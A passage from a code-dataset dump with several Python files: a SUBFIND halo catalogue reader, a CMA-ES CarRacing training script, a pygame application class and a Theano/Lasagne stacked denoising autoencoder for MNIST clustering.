f[\"Header\"].attrs[\"Nsubgroups_Total\"]\r\n ngroups = f[\"Header\"].attrs[\"Ngroups_ThisFile\"]\r\n nsubs = f[\"Header\"].attrs[\"Nsubgroups_ThisFile\"]\r\n \r\n if filenum == 0:\r\n self.ngroups = f[\"Header\"].attrs[\"Ngroups_Total\"]\r\n self.nids = f[\"Header\"].attrs[\"Nids_Total\"]\r\n self.nfiles = f[\"Header\"].attrs[\"NumFiles\"]\r\n self.nsubs = f[\"Header\"].attrs[\"Nsubgroups_Total\"]\r\n\r\n self.id_type = f[\"Subhalo/SubhaloIDMostbound\"].value.dtype\r\n\r\n self.group_len = np.empty(totngroups, dtype=np.uint32)\r\n self.group_lentab = np.empty(totngroups, dtype=((np.uint32,6)))\r\n self.group_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_masstab = np.empty(totngroups, dtype=((np.float64,6)))\r\n self.group_pos = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_vel = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_m_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit500 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit500 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_nsubs = np.empty(totngroups, dtype=np.uint32)\r\n self.group_firstsub = np.empty(totngroups, dtype=np.uint32)\r\n #self.group_sfr = np.empty(totngroups, dtype=np.float64)\r\n \r\n self.sub_len = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_lentab = np.empty(totnsubs, dtype=((np.uint32,6)))\r\n self.sub_parent = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_mass = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_masstab = np.empty(totnsubs, dtype=((np.float64,6)))\r\n self.sub_pos = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_vel = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_cm = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_spin = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_veldisp = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmax = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmaxrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_halfmassrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_id_mostbound = np.empty(totnsubs, dtype=self.id_type)\r\n self.sub_grnr = np.empty(totnsubs, dtype=np.uint32)\r\n \r\n if ngroups > 0:\r\n locs = slice(skip_gr, skip_gr + ngroups)\r\n self.group_len[locs] = f[\"Group/GroupLen\"].value\r\n self.group_lentab[locs] = f[\"Group/GroupLenType\"].value\r\n self.group_mass[locs] = f[\"Group/GroupMass\"].value\r\n self.group_masstab[locs] = f[\"Group/GroupMassType\"].value\r\n self.group_pos[locs] = f[\"Group/GroupPos\"].value\r\n self.group_vel[locs] = f[\"Group/GroupVel\"].value\r\n self.group_m_mean200[locs] = f[\"Group/Group_M_Mean200\"].value\r\n self.group_r_mean200[locs] = f[\"Group/Group_R_Mean200\"].value\r\n self.group_m_crit200[locs] = f[\"Group/Group_M_Crit200\"].value\r\n self.group_r_crit200[locs] = f[\"Group/Group_R_Crit200\"].value\r\n self.group_m_crit500[locs] = f[\"Group/Group_M_Crit500\"].value\r\n self.group_r_crit500[locs] = f[\"Group/Group_R_Crit500\"].value\r\n self.group_m_tophat200[locs] = f[\"Group/Group_M_TopHat200\"].value\r\n self.group_r_tophat200[locs] = f[\"Group/Group_R_TopHat200\"].value\r\n self.group_nsubs[locs] = f[\"Group/GroupNsubs\"].value\r\n self.group_firstsub[locs] = f[\"Group/GroupFirstSub\"].value\r\n #self.group_sfr = f[\"Group/GroupSFR\"].value\r\n skip_gr += ngroups\r\n \r\n if nsubs > 0:\r\n locs = slice(skip_sub, skip_sub + nsubs)\r\n self.sub_len[locs] = f[\"Subhalo/SubhaloLen\"].value\r\n self.sub_lentab[locs] = f[\"Subhalo/SubhaloLenType\"].value\r\n self.sub_parent[locs] = f[\"Subhalo/SubhaloParent\"].value\r\n self.sub_mass[locs] = f[\"Subhalo/SubhaloMass\"].value\r\n self.sub_masstab[locs] = f[\"Subhalo/SubhaloMassType\"].value\r\n self.sub_pos[locs] = f[\"Subhalo/SubhaloPos\"].value\r\n self.sub_vel[locs] = f[\"Subhalo/SubhaloVel\"].value\r\n self.sub_cm[locs] = f[\"Subhalo/SubhaloCM\"].value\r\n self.sub_spin[locs] = f[\"Subhalo/SubhaloSpin\"].value\r\n self.sub_veldisp[locs] = f[\"Subhalo/SubhaloVelDisp\"].value\r\n self.sub_vmax[locs] = f[\"Subhalo/SubhaloVmax\"].value\r\n self.sub_vmaxrad[locs] = f[\"Subhalo/SubhaloVmaxRad\"].value\r\n self.sub_halfmassrad[locs] = f[\"Subhalo/SubhaloHalfmassRad\"].value\r\n self.sub_id_mostbound[locs] = f[\"Subhalo/SubhaloIDMostbound\"].value\r\n self.sub_grnr[locs] = f[\"Subhalo/SubhaloGrNr\"].value\r\n skip_sub += nsubs\r\n \r\n f.close() \r\n filenum += 1\r\n if filenum == self.nfiles: \r\n doneflag = True\r\n \r\n self.group_offsettab = np.append(np.array([[0,0,0,0,0,0]],dtype=np.uint32),self.group_lentab.cumsum(axis=0)[0:-1],axis=0) \r\n self.sub_offsettab = np.append(np.array([[0,0,0,0,0,0]],dtype=np.uint32),self.sub_lentab.cumsum(axis=0)[0:-1],axis=0) \r\n for curgr in np.arange(self.ngroups):\r\n if self.group_nsubs[curgr] >= 1:\r\n cur_add_offsettab = self.group_offsettab[curgr] - self.sub_offsettab[self.group_firstsub[curgr]] \r\n self.sub_offsettab[self.group_firstsub[curgr]:self.group_firstsub[curgr]+self.group_nsubs[curgr]] += cur_add_offsettab\r\n \r\n print()\r\n print( \"number of groups =\", self.ngroups)\r\n print( \"number of subgroups =\", self.nsubs)\r\n if self.nsubs > 0:\r\n print( \"largest group of length\",self.group_len[0],\"has\",self.group_nsubs[0],\"subhalos\")\r\n print()\r\n \r\n def read_ids(self):\r\n self.ids = np.empty(self.nids,dtype=self.id_type)\r\n \r\n if self.nids>0: \r\n filenum = 0\r\n doneflag = False\r\n skip_ids = 0\r\n while not doneflag:\r\n curfile = self.idbase + str(filenum)\r\n \r\n if (not os.path.exists(curfile)):\r\n print( \"file not found:\", curfile)\r\n sys.exit()\r\n \r\n f = open(curfile,'rb')\r\n\r\n idngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n idtotngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n idnids = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n idtotnids = np.fromfile(f, dtype=np.uint64, count=1)[0]\r\n idntask = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n idoffset = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n\r\n if self.swap:\r\n idngroups = idngroups.byteswap()\r\n idtotngroups = idtotngroups.byteswap()\r\n idnids = idnids.byteswap()\r\n idtotnids = idtotnids.byteswap()\r\n idntask = idntask.byteswap()\r\n idoffset = idoffset.byteswap()\r\n\r\n assert skip_ids == idoffset\r\n \r\n self.ids[skip_ids:skip_ids+idnids] = np.fromfile(f, dtype=self.id_type, count=idnids)\r\n skip_ids += idnids\r\n\r\n filenum += 1\r\n if filenum == self.nfiles: doneflag = True\r\n assert skip_ids == self.nids\r\n if self.swap:\r\n self.ids.byteswap(True)\r\n else:\r\n print( \"there are no IDs in this SUBFIND output!\")\r\n","sub_path":"data/readsubf.py","file_name":"readsubf.py","file_ext":"py","file_size_in_byte":18892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83047950","text":"import time\nimport gym\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\nimport scipy.sparse as sc\nfrom scipy.stats import multivariate_normal\nimport cma\nimport utils.network\nimport utils.game\nimport sys\nimport os\n\n#dtype = torch.long\ndtype = torch.cuda.FloatTensor\ntorch.device('cuda')\n\n\ndef typedevice(tensor,typ,devi):\n return tensor.to(device=devi,dtype=typ)\n\n\ndef progtot():\n global dtype\n global es\n mu=np.zeros(3*1025)\n es = cma.CMAEvolutionStrategy(mu, 0.2)\n #es.optimize(utils.game.launch_scenarios)\n #res = es.result\n while not es.stop():\n print('hey')\n solutions = es.ask()\n es.tell(solutions, [utils.game.launch_scenarios(s) for s in solutions])\n es.disp()\n return(es.result_pretty())\n\nif __name__ == \"__main__\":\n dtype = torch.long\n #dtype = torch.cuda.FloatTensor\n device = 'cpu'\n #device= 'cuda'\n env = gym.make('CarRacing-v0')\n try:\n W=np.load('W.npy',allow_pickle=True)\n print('loaded W')\n except FileNotFoundError:\n print('not found creating W')\n W=sc.random(Nr,Nr,density=float(D/Nr))\n W=rho/max(abs(np.linalg.eigvals(W.A)))*W\n W=(2*W-(W!=0))\n W=W.A\n np.save('W.npy',W)\n utils.network.dtype=dtype\n utils.game.dtype=dtype\n utils.network.W=W\n utils.game.env=env\n utils.network.device=device\n utils.game.device=device\n try :\n net = torch.load('model.pt')\n net.eval()\n print('loaded net')\n except FileNotFoundError:\n print('creating net')\n net=utils.network.initnet(0.9,dtype)\n torch.save(net, 'model.pt')\n utils.game.net=net\n progtot()\n env.close()\n\n\n","sub_path":"Clean/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395410188","text":"import pygame\nfrom Vector import Vector\nfrom Colours import colour\n\nclass App:\n \"\"\"\n Initialisation methods\n __init__ = initialisation of class\n __default__ = inputting default arguments\n initPygame = initialise the pygame instance\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.__default__(**kwargs)\n self.initPygame()\n self.isOpen = True\n\n def __default__(self, **kwargs):\n self.defaultParams = {\n \"fps\": 144,\n \"tickrate\": 50,\n \"resolution\": Vector(1200, 900),\n }\n # set params\n self.defaultParams.update(kwargs)\n for param, value in self.defaultParams.iteritems():\n setattr(self, param, value)\n # dt for game objects\n self.dt = self.tickrate/float(self.fps)\n\n def initPygame(self):\n pygame.init()\n self.clock = pygame.time.Clock()\n self.display = pygame.display.set_mode(self.resolution, 0, 32)\n self.display.fill(colour[\"white\"])\n self.events = []\n self.objects = {}\n\n \"\"\"\n addObjects = add game objects\n Must be a class with the following methods:\n render(self, display),\n update(self, dt),\n \"\"\"\n def addObjects(self, **objectList):\n for name, gameObject in objectList.iteritems():\n if name in self.objects:\n raise NameError(\"Duplicate of object {0} at {1}\".format(name, gameObject))\n self.objects[name] = gameObject\n\n \"\"\"\n run = go through one game loop\n update = update all physics\n render = render everything\n getKeyPress = handle input\n \"\"\"\n def run(self):\n try:\n # process events\n if self.isOpen:\n pygame.event.pump()\n self.events = pygame.event.get()\n # game loop\n for function in (self.getKeyPress, self.update, self.render):\n if self.isOpen:\n function()\n # keyboard cancel\n except KeyboardInterrupt:\n self.isOpen = False\n # return game state\n return self.isOpen \n\n def update(self):\n self.clock.tick(self.fps)\n for name, gameObject in self.objects.iteritems():\n gameObject.update(self.dt)\n \n def render(self):\n self.display.fill(colour[\"rainbow\"])\n colour[\"rainbow\"].cycle(self.dt)\n for name, gameObject in self.objects.iteritems():\n gameObject.render(self.display)\n pygame.display.update()\n\n def getKeyPress(self):\n for event in self.events:\n if event.type == pygame.QUIT:\n self.close()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.close()\n\n def close(self):\n pygame.quit()\n self.isOpen = False\n ","sub_path":"Projects/STG Ideas/Rainbow Test/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"95858093","text":"\"\"\"\n This tutorial introduces stacked denoising auto-encoders (SdA) using Theano.\n\n Denoising autoencoders are the building blocks for SdA.\n They are based on auto-encoders as the ones used in Bengio et al. 2007.\n An autoencoder takes an input x and first maps it to a hidden representation\n y = f_{\\theta}(x) = s(Wx+b), parameterized by \\theta={W,b}. The resulting\n latent representation y is then mapped back to a \"reconstructed\" vector\n z \\in [0,1]^d in input space z = g_{\\theta'}(y) = s(W'y + b'). The weight\n matrix W' can optionally be constrained such that W' = W^T, in which case\n the autoencoder is said to have tied weights. The network is trained such\n that to minimize the reconstruction error (the error between x and z).\n\n For the denosing autoencoder, during training, first x is corrupted into\n \\tilde{x}, where \\tilde{x} is a partially destroyed version of x by means\n of a stochastic mapping. Afterwards y is computed as before (using\n \\tilde{x}), y = s(W\\tilde{x} + b) and z as s(W'y + b'). The reconstruction\n error is now measured between z and the uncorrupted input x, which is\n computed as the cross-entropy :\n - \\sum_{k=1}^d[ x_k \\log z_k + (1-x_k) \\log( 1-z_k)]\n\n\n References :\n - P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and\n Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,\n 2008\n - Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise\n Training of Deep Networks, Advances in Neural Information Processing\n Systems 19, 2007\n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport timeit\n\nimport numpy\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom logistic_sgd_theano import LogisticRegression\nfrom mlp_theano import HiddenLayer\nfrom dA_theano import dA\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics import adjusted_rand_score\n# from kmeans_numpy import kmeans\nfrom load_data import load_data\nfrom sklearn.cluster import spectral\nimport lasagne\nfrom bestMap import bestMap\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n\n# start-snippet-1\nclass SdA(object):\n \"\"\"Stacked denoising auto-encoder class (SdA)\n\n A stacked denoising autoencoder model is obtained by stacking several\n dAs. The hidden layer of the dA at layer `i` becomes the input of\n the dA at layer `i+1`. The first layer dA gets as input the input of\n the SdA, and the hidden layer of the last dA represents the output.\n Note that after pretraining, the SdA is dealt with as a normal MLP,\n the dAs are only used to initialize the weights.\n \"\"\"\n\n def __init__(\n self,\n numpy_rng,\n theano_rng=None,\n n_ins=784,\n hidden_layers_sizes=[500, 500],\n n_outs=10,\n corruption_levels=[0.1, 0.1]\n ):\n \"\"\" This class is made to support a variable number of layers.\n\n :type numpy_rng: numpy.random.RandomState\n :param numpy_rng: numpy random number generator used to draw initial\n weights\n\n :type theano_rng: theano.tensor.shared_randomstreams.RandomStreams\n :param theano_rng: Theano random generator; if None is given one is\n generated based on a seed drawn from `rng`\n\n :type n_ins: int\n :param n_ins: dimension of the input to the sdA\n\n :type hidden_layers_sizes: list of ints\n :param hidden_layers_sizes: intermediate layers size, must contain\n at least one value\n\n :type n_outs: int\n :param n_outs: dimension of the output of the network\n\n :type corruption_levels: list of float\n :param corruption_levels: amount of corruption to use for each\n layer\n \"\"\"\n\n self.sigmoid_layers = []\n self.dA_layers = []\n self.params = []\n self.n_layers = len(hidden_layers_sizes)\n\n assert self.n_layers > 0\n\n if not theano_rng:\n theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n # allocate symbolic variables for the data\n self.x = T.matrix('x') # the data is presented as rasterized images\n self.y = T.ivector('y') # the labels are presented as 1D vector of\n # self.l = T.matrix('l')\n # [int] labels\n # end-snippet-1\n\n # The SdA is an MLP, for which all weights of intermediate layers\n # are shared with a different denoising autoencoders\n # We will first construct the SdA as a deep multilayer perceptron,\n # and when constructing each sigmoidal layer we also construct a\n # denoising autoencoder that shares weights with that layer\n # During pretraining we will train these autoencoders (which will\n # lead to chainging the weights of the MLP as well)\n # During finetunining we will finish training the SdA by doing\n # stochastich gradient descent on the MLP\n\n # start-snippet-2\n for i in range(self.n_layers):\n # construct the sigmoidal layer\n\n # the size of the input is either the number of hidden units of\n # the layer below or the input size if we are on the first layer\n if i == 0:\n input_size = n_ins\n else:\n input_size = hidden_layers_sizes[i - 1]\n\n # the input to this layer is either the activation of the hidden\n # layer below or the input of the SdA if you are on the first\n # layer\n if i == 0:\n layer_input = self.x\n else:\n layer_input = self.sigmoid_layers[-1].output\n\n # l = self.l\n\n sigmoid_layer = HiddenLayer(rng=numpy_rng,\n input=layer_input,\n n_in=input_size,\n n_out=hidden_layers_sizes[i],\n activation=T.nnet.relu)\n # add the layer to our list of layers\n self.sigmoid_layers.append(sigmoid_layer)\n # its arguably a philosophical question...\n # but we are going to only declare that the parameters of the\n # sigmoid_layers are parameters of the StackedDAA\n # the visible biases in the dA are parameters of those\n # dA, but not the SdA\n self.params.extend(sigmoid_layer.params)\n\n # Construct a denoising autoencoder that shared weights with this\n # layer\n dA_layer = dA(numpy_rng=numpy_rng,\n theano_rng=theano_rng,\n input=layer_input,\n # l = l,\n n_visible=input_size,\n n_hidden=hidden_layers_sizes[i],\n W=sigmoid_layer.W,\n bhid=sigmoid_layer.b)\n self.dA_layers.append(dA_layer)\n\n # def pretraining_functions(self, train_set_x, batch_size, laplacian):\n def pretraining_functions(self, train_set_x, batch_size):\n ''' Generates a list of functions, each of them implementing one\n step in trainnig the dA corresponding to the layer with same index.\n The function will require as input the minibatch index, and to train\n a dA you just need to iterate, calling the corresponding function on\n all minibatch indexes.\n\n :type train_set_x: theano.tensor.TensorType\n :param train_set_x: Shared variable that contains all datapoints used\n for training the dA\n\n :type batch_size: int\n :param batch_size: size of a [mini]batch\n\n :type learning_rate: float\n :param learning_rate: learning rate used during training for any of\n the dA layers\n '''\n # index to a [mini]batch\n index = T.lscalar('index') # index to a minibatch\n corruption_level = T.scalar('corruption') # % of corruption to use\n learning_rate = T.scalar('lr') # learning rate to use\n # begining of a batch, given `index`\n batch_begin = index * batch_size\n # ending of a batch given `index`\n batch_end = batch_begin + batch_size\n\n pretrain_fns = []\n i = 0\n for dA in self.dA_layers:\n # get the cost and the updates list\n if i == 0:\n cost, updates = dA.get_cost_updates(corruption_level,\n learning_rate, linear_state=[0, 1])\n if i == self.dA_layers.__len__():\n cost, updates = dA.get_cost_updates(corruption_level,\n learning_rate, linear_state=[1, 0])\n else:\n cost, updates = dA.get_cost_updates(corruption_level,\n learning_rate, linear_state=[0, 0])\n # compile the theano function\n fn = theano.function(\n inputs=[\n index,\n theano.In(corruption_level, value=0.2),\n theano.In(learning_rate, value=0.1)\n ],\n outputs=cost,\n updates=updates,\n givens={\n self.x: train_set_x[batch_begin: batch_end]\n }\n )\n # append `fn` to the list of functions\n pretrain_fns.append(fn)\n i += 1\n\n return pretrain_fns\n\n def finetuning_functions(self, train_set_x, batch_size, learning_rate_shared, input_var):\n ''' Generates a list of functions, each of them implementing one\n step in trainnig the dA corresponding to the layer with same index.\n The function will require as input the minibatch index, and to train\n a dA you just need to iterate, calling the corresponding function on\n all minibatch indexes.\n\n :type train_set_x: theano.tensor.TensorType\n :param train_set_x: Shared variable that contains all datapoints used\n for training the dA\n\n :type batch_size: int\n :param batch_size: size of a [mini]batch\n\n :type learning_rate: float\n :param learning_rate: learning rate used during training for any of\n the dA layers\n '''\n\n # index to a [mini]batch\n index = T.lscalar('index') # index to a minibatch\n corruption_level = T.scalar('corruption') # % of corruption to use\n # learning_rate = T.scalar('lr') # learning rate to use\n # begining of a batch, given `index`\n batch_begin = index * batch_size\n # ending of a batch given `index`\n batch_end = batch_begin + batch_size\n\n hid1 = self.dA_layers[0].get_hidden_values(input_var)\n hid2 = self.dA_layers[1].get_hidden_values(hid1)\n hid3 = self.dA_layers[2].get_hidden_values(hid2)\n hid4 = self.dA_layers[3].get_hidden_values_linear(hid3)\n recons4 = self.dA_layers[3].get_reconstructed_input(hid4)\n recons3 = self.dA_layers[2].get_reconstructed_input(recons4)\n recons2 = self.dA_layers[1].get_reconstructed_input(recons3)\n recons1 = self.dA_layers[0].get_reconstructed_input_linear(recons2)\n\n loss = lasagne.objectives.squared_error(input_var, recons1)\n loss = loss.mean()\n\n params = self.params\n updates = lasagne.updates.sgd(\n loss, params, learning_rate=learning_rate_shared)\n\n finetune = theano.function(\n inputs=[\n # index,\n input_var\n ],\n outputs=loss,\n updates=updates,\n # givens={\n # # self.x: train_set_x[batch_begin: batch_end],\n # # self.l: laplacian[:,batch_begin: batch_end]\n # }\n )\n\n return finetune\n\n def load(self, fname):\n with open(fname) as fin:\n args_save = pickle.load(fin)\n return args_save\n # for key, v in args_save.items():\n # if key in self.args:\n # self.args[key][:] = v\n\n\ndef Laplacian(x, sigma=0.5):\n D = T.sqrt(\n T.maximum((x ** 2).sum(1).reshape((x.shape[0], 1)) + (x ** 2).sum(1).reshape((1, x.shape[0])) - 2 * x.dot(x.T),\n sys.float_info.epsilon))\n Dt = T.exp(-D / (2 * sigma ** 2)) - T.identity_like(D)\n degree = Dt.sum(axis=1)\n L = theano.tensor.nlinalg.diag(degree) - Dt\n L = L.eval()\n return L\n\ndef build_dA_fromsaved(input_var=None, n_in=None, layer_struct=None, corruption_level=None, nonlinearity=[[None, None],[None, None],[None, None],[None, None]], dA_layers=None):\n l_in = lasagne.layers.InputLayer(shape=(None, n_in),\n input_var=input_var)\n l_in_drop = lasagne.layers.DropoutLayer(l_in, p=0.0)\n\n l_hid1 = lasagne.layers.DenseLayer(\n l_in_drop, num_units=layer_struct[0],\n nonlinearity=nonlinearity[0][0],\n W=args_load.get('encoder_0_weight').T,\n b=args_load.get('encoder_0_bias'))\n\n l_hid1_drop = lasagne.layers.DropoutLayer(l_hid1, p=0.0)\n\n l_hid2 = lasagne.layers.DenseLayer(\n l_hid1_drop, num_units=layer_struct[1],\n nonlinearity=nonlinearity[1][0],\n W=args_load.get('encoder_1_weight').T,\n b=args_load.get('encoder_1_bias'))\n\n l_hid2_drop = lasagne.layers.DropoutLayer(l_hid2, p=0.0)\n\n l_hid3 = lasagne.layers.DenseLayer(\n l_hid2_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[2][0],\n W=args_load.get('encoder_2_weight').T,\n b=args_load.get('encoder_2_bias'))\n\n l_hid3_drop = lasagne.layers.DropoutLayer(l_hid3, p=0.0)\n\n l_hid4 = lasagne.layers.DenseLayer(\n l_hid3_drop, num_units=layer_struct[3],\n nonlinearity=nonlinearity[3][0],\n W=args_load.get('encoder_3_weight').T,\n b=args_load.get('encoder_3_bias'))\n\n l_hid4_drop = lasagne.layers.DropoutLayer(l_hid4, p=0.0)\n\n l_recons4 = lasagne.layers.DenseLayer(\n l_hid4_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[3][1],\n W=args_load.get('decoder_3_weight').T,\n b=args_load.get('decoder_3_bias'))\n\n l_recons3 = lasagne.layers.DenseLayer(\n l_recons4, num_units=layer_struct[1],\n nonlinearity=nonlinearity[2][1],\n W=args_load.get('decoder_2_weight').T,\n b=args_load.get('decoder_2_bias'))\n\n l_recons2 = lasagne.layers.DenseLayer(\n l_recons3, num_units=layer_struct[0],\n nonlinearity=nonlinearity[1][1],\n W=args_load.get('decoder_1_weight').T,\n b=args_load.get('decoder_1_bias'))\n\n l_recons1 = lasagne.layers.DenseLayer(\n l_recons2, num_units=n_in,\n nonlinearity=nonlinearity[0][1],\n W=args_load.get('decoder_0_weight').T,\n b=args_load.get('decoder_0_bias'))\n\n return l_hid4_drop, l_recons1\n\n\ndef build_dA(input_var=None, n_in=None, layer_struct=None, corruption_level=None, nonlinearity=[[None, None],[None, None],[None, None],[None, None]], dA_layers=None):\n l_in = lasagne.layers.InputLayer(shape=(None, n_in),\n input_var=input_var)\n l_in_drop = lasagne.layers.DropoutLayer(l_in, p=0.0)\n\n l_hid1 = lasagne.layers.DenseLayer(\n l_in_drop, num_units=layer_struct[0],\n nonlinearity=nonlinearity[0][0],\n W=dA_layers[0].W,\n b=dA_layers[0].b)\n\n l_hid1_drop = lasagne.layers.DropoutLayer(l_hid1, p=0.0)\n\n l_hid2 = lasagne.layers.DenseLayer(\n l_hid1_drop, num_units=layer_struct[1],\n nonlinearity=nonlinearity[1][0],\n W=dA_layers[1].W,\n b=dA_layers[1].b)\n\n l_hid2_drop = lasagne.layers.DropoutLayer(l_hid2, p=0.0)\n\n l_hid3 = lasagne.layers.DenseLayer(\n l_hid2_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[2][0],\n W=dA_layers[2].W,\n b=dA_layers[2].b)\n\n l_hid3_drop = lasagne.layers.DropoutLayer(l_hid3, p=0.0)\n\n l_hid4 = lasagne.layers.DenseLayer(\n l_hid3_drop, num_units=layer_struct[3],\n nonlinearity=nonlinearity[3][0],\n W=dA_layers[3].W,\n b=dA_layers[3].b)\n\n l_hid4_drop = lasagne.layers.DropoutLayer(l_hid4, p=0.0)\n\n l_recons4 = lasagne.layers.DenseLayer(\n l_hid4_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[3][1],\n W=dA_layers[3].W_prime,\n b=dA_layers[3].b_prime)\n\n l_recons3 = lasagne.layers.DenseLayer(\n l_recons4, num_units=layer_struct[1],\n nonlinearity=nonlinearity[2][1],\n W=dA_layers[2].W_prime,\n b=dA_layers[2].b_prime)\n\n l_recons2 = lasagne.layers.DenseLayer(\n l_recons3, num_units=layer_struct[0],\n nonlinearity=nonlinearity[1][1],\n W=dA_layers[1].W_prime,\n b=dA_layers[1].b_prime)\n\n l_recons1 = lasagne.layers.DenseLayer(\n l_recons2, num_units=n_in,\n nonlinearity=nonlinearity[0][1],\n W=dA_layers[0].W_prime,\n b=dA_layers[0].b_prime)\n\n return l_hid4_drop, l_recons1\n\ndef iterate_minibatches(inputs, targets, batchsize, shuffle=False):\n assert len(inputs) == len(targets)\n if shuffle:\n indices = numpy.arange(len(inputs))\n numpy.random.shuffle(indices)\n for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):\n if shuffle:\n excerpt = indices[start_idx:start_idx + batchsize]\n else:\n excerpt = slice(start_idx, start_idx + batchsize)\n yield inputs[excerpt], targets[excerpt], excerpt\n\nfinetune_lr = 0.1\nlearning_rate_shared = theano.shared(lasagne.utils.floatX(finetune_lr))\npretraining_epochs = 180\nfinetuning_epochs = 360\npretrain_lr = 0.1\n# training_epochs=1000\ndataset = 'mnist.pkl.gz'\nbatch_size = 256\n\"\"\"\nDemonstrates how to train and test a stochastic denoising autoencoder.\n\nThis is demonstrated on MNIST.\n\n:type learning_rate: float\n:param learning_rate: learning rate used in the finetune stage\n(factor for the stochastic gradient)\n\n:type pretraining_epochs: int\n:param pretraining_epochs: number of epoch to do pretraining\n\n:type pretrain_lr: float\n:param pretrain_lr: learning rate to be used during pre-training\n\n:type n_iter: int\n:param n_iter: maximal number of iterations ot run the optimizer\n\n:type dataset: string\n:param dataset: path the the pickled dataset\n\n\"\"\"\n\ndatasets = load_data(dataset, data_size=70000)\n\ntrain_set_x, train_set_y = datasets\nnClusters = len(numpy.unique(train_set_y))\n\n# compute number of minibatches for training, validation and testing\nn_train_batches = train_set_x.get_value(borrow=True).shape[0]\nn_train_batches //= batch_size\n\n# numpy random generator\n# start-snippet-3\nnumpy_rng = numpy.random.RandomState(89677)\nprint('... building the model, squared error, 2 linear activations fixed')\n# construct the stacked denoising autoencoder class\nsda = SdA(\n numpy_rng=numpy_rng,\n n_ins=28 * 28,\n hidden_layers_sizes=[500, 500, 2000, 10],\n n_outs=10\n)\ninput_var = T.matrix('inputs')\nX = numpy.asarray(train_set_x.eval())\ny = numpy.asarray(train_set_y.eval())\nnonlinearities = [[lasagne.nonlinearities.rectify, lasagne.nonlinearities.linear],\n [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify]]\nhidden_layers_sizes = [500, 500, 2000, 10]\n# Deep fine-tuning\nargs_load = sda.load('mnist_pt_full3.arg')\nlearning_rate = 0.1\ninit_learning_rate = learning_rate\nn_epochs = 360\ncorruption_levels = [.2, .2, .2, .2]\nlearning_rate_shared = theano.shared(lasagne.utils.floatX(learning_rate))\nencoder, network = build_dA_fromsaved(input_var, n_in=X.shape[1], layer_struct=hidden_layers_sizes, corruption_level=corruption_levels, dA_layers=args_load, nonlinearity=nonlinearities)\n# end-snippet-3 start-snippet-4\n#########################\n# PRETRAINING THE MODEL #\n#########################\n# Calculate Laplacian for each minibatch\n# laplacian = T.matrix('laplacian')\n# tl = theano.typed_list.TypedListType(theano.sandbox.cuda.type.CudaNdarrayType)()\n# v = theano.sandbox.cuda.type.CudaNdarrayType()\n# o = theano.typed_list.append(tl, v)\n# f = theano.function([tl, v], o)\n\n# for batch_index in range(n_train_batches):\n# index to a [mini]batch\n# begining of a batch, given `index`\n# batch_begin = batch_index * batch_size\n# ending of a batch given `index`\n# batch_end = batch_begin + batch_size\n# if batch_index == 0:\n# L = Laplacian(train_set_x[batch_begin:batch_end])\n# else:\n# L = numpy.concatenate((L, Laplacian(train_set_x[batch_begin:batch_end])), axis=1)\n\n# laplacian = theano.shared(numpy.asarray(L,dtype=theano.config.floatX),borrow=True)\n\n# laplacian = theano.shared(laplacian, borrow=True)\n# print('... getting the pretraining functions')\n# pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x,\n# batch_size=batch_size)\n# # laplacian=laplacian)\n#\n#\n# print('... pre-training the model')\n# start_time = timeit.default_timer()\n# ## Pre-train 